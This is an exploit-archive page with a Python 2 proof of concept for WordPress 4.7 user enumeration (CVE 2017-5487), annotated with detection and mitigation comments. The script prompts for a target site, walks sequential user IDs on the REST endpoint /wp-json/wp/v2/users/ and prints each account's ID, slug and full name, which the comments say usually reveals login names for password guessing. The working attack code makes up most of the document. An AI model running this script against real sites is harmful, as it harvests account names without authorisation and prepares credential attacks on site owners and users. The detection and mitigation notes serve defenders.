
Wordpress >=4.7 User Enumeration Exploit

Posted on 30 November -0001

# Wordpress >=4.7 User Enumeration Exploit
#
# Python 2 proof of concept (it relies on raw_input). The banner cites
# CVE 2017-5487 and WPVDB ID 8715.
#
# What it does: for each numeric ID it sends one GET request, with no
# credentials or custom headers, to <site>/wp-json/wp/v2/users/<id> and
# prints the 'id', 'slug' and 'name' fields of the JSON reply.
#
# Why defenders care: the slug is usually derived from the account's login
# name (NOTE(review): confirm for the site in question), so the output is a
# ready list of account names for password-guessing attempts.
#
# Detection: web access logs show a run of requests to
# /wp-json/wp/v2/users/<n>, with n increasing by one, from a single client.
# requests.get is called without headers, so the library's default
# python-requests User-Agent is sent unless the script is modified.
#
# Mitigation: run a WordPress release that contains the fix for the CVE
# cited in the banner; where public author listings are not needed, require
# authentication for the REST users routes; rate-limit logins and enforce
# multi-factor authentication so a known username alone is not enough.
import json

import requests

# NOTE(review): the banner literals appear to have lost their backslash
# escapes during extraction (for example a leading "t" where "\t" is
# likely); they are reproduced exactly as they appear on the page.
print("#############################################################")
print("tWordpress 4.7 User Enumeration PoC (CVE 2017-5487) tttWPVDB ID: 8715 tttBy Alienwithin")
print("############################################################# ")

targetSite = raw_input("Please enter the URL to target e.g. http://target.com : Site URL: ")
NumberOfUsers = raw_input("Please enter the number of users to retrieve e.g. 10 ")

print("ID || Username || Full Name ")

# range() excludes its upper bound, so IDs 1 .. N-1 are requested.
for user_id in range(1, int(NumberOfUsers)):
    response = requests.get(targetSite + '/wp-json/wp/v2/users/' + str(user_id))
    record = json.loads(response.text)

    if 'id' in record:
        # A reply carrying 'id' is treated as a user object; the fields are
        # read in the order id, name, slug.
        found_id = record['id']
        full_name = record['name']
        login_slug = record['slug']
        print(" || ".join([str(found_id), str(login_slug), str(full_name)]) + " ")
    else:
        # Any JSON reply without an 'id' key is reported as "no such user".
        print("No user with ID :" + str(user_id))

    response.close()

 
